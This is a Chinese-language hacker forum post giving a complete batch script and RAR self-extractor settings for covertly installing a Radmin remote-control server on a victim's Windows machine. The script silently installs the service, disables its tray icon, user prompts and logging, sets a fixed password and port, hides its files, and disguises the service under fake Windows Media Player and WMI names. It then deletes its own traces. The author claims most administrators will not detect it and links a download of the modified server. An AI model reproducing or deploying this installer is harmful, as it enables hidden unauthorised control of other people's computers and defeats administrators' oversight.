文章作者:Power韩
信息来源:
http://www.hngdzx.com/bbsp
我中意它。。没有办法 给大家说说我平时的radmin服务端嘀配置
为了方便安装。我们制作一个rar自解程序。你们应该会吧。。
我们建一个bat文件,内容如下:
net stop r_server
保存为1.bat文件。作用:以防万一
在建一个bat,内容如下:
@echo off
@system.exe /uninstall /silence
@system.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>>
c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]>>
c:\server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:\server.reg
echo
"Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7>>
c:\server.reg
echo "Port"=hex:7a,00,00,00>> c:\server.reg
echo "Timeout"=hex:0a,00,00,00>> c:\server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:\server.reg
echo "LogFilePath"="c:\\logfile.txt">> c:\server.reg
echo "FilterIp"=hex:00,00,00,00>> c:\server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:\server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:\server.reg
echo "AskUser"=hex:00,00,00,00>> c:\server.reg
echo "EnableEventLog"=hex:00,00,00,00>> c:\server.reg>> c:\server.reg
@regedit /s c:\server.reg
@net start r_server
@attrib +r +h %systemroot%\system32\drivers\system.exe
@attrib +r +h %systemroot%\system32\drivers\admdll.dll
@attrib +r +h %systemroot%\system32\drivers\raddrv.dll
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>
c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动
媒体,驱动程序和库提供基层安全协议服务。">> c:\ip.reg
@regedit /s c:\ip.reg
@del c:\ip.reg /f /q
@del c:\server.reg /f /q
@sc config r_server displayname= "Windows Management Instrumentation
Player Drivers"
@del %systemroot%\system32\haha.exe /f /q
@del %systemroot%\system32\drivers\sc.exe /f /q
@del %systemroot%\system32\drivers\1.bat /f /q
@del %systemroot%\system32\drivers\2.bat /f /q
保存为2.bat文件 ,文件。。。。实际应用中注意:
1."Port"=hex:7a,00,00,00,换成你的radmin中reg文件中的相应内容,这个是
端口
2."Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7这个
是密码。。换成相应的即可
3.其他默认,大家应该知道了。。我没有使用注册表,而是bat,原因(1.我喜
欢bat,嘿嘿。。。)
4.配置RAR高级自解压缩选项嘀时候。。注意那个解压路径 写成%systemroot%
\system32\drivers这个
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入2.bat
步骤3 在『解压前运行』输入1.bat
步骤4 选择RAR高级自解压缩中的『模式』 改两个地方 选择『全部隐藏』和『
覆盖所有文件』
5.把你的r_server改名成system
6.RAR打包的时候不要忘记了SC这个程序
在上面我使用到了几个隐藏技巧。。
1.使用了attrib命令
2.利用注册表中的服务说明。。就是下面这一段
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>
c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动
媒体,驱动程序和库提供基层安全协议服务。">> c:\ip.reg
@regedit /s c:\ip.reg
@del c:\ip.reg /f /q
大家应该可以看懂
3.使用SC改变了r_server服务名
@sc config r_server displayname= "Windows Management Instrumentation
Player Drivers"
有了以上的几步。。很多管理员都不会查出来。。当然普通人更不会了
大家选择一个好的端口就行了。。。如果要替换服务。。自己加几个命令在
2.bat中就是了。。
优点:
1.在 系统服务 中看见的是Windows Management Instrumentation Player
Drivers 服务 (可以自定义)
2.服务说明是 提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全
协议服务
3.在cmd下面 使用net start 看见的自起动服务是Windows Management
Instrumentation Player Drivers
4.在进程中看见的是system(可以自定义,在2.bat文件中相应的地方改一下,
注意不要和已有的系统进程起冲突)
以上的程序。。SC,还有经过处理的RAdmin的服务端
下载地址:
http://superhan.ys168.com
有下载。。。
这个就是我使用的。。有好的给我提提意见(替换服务出外)
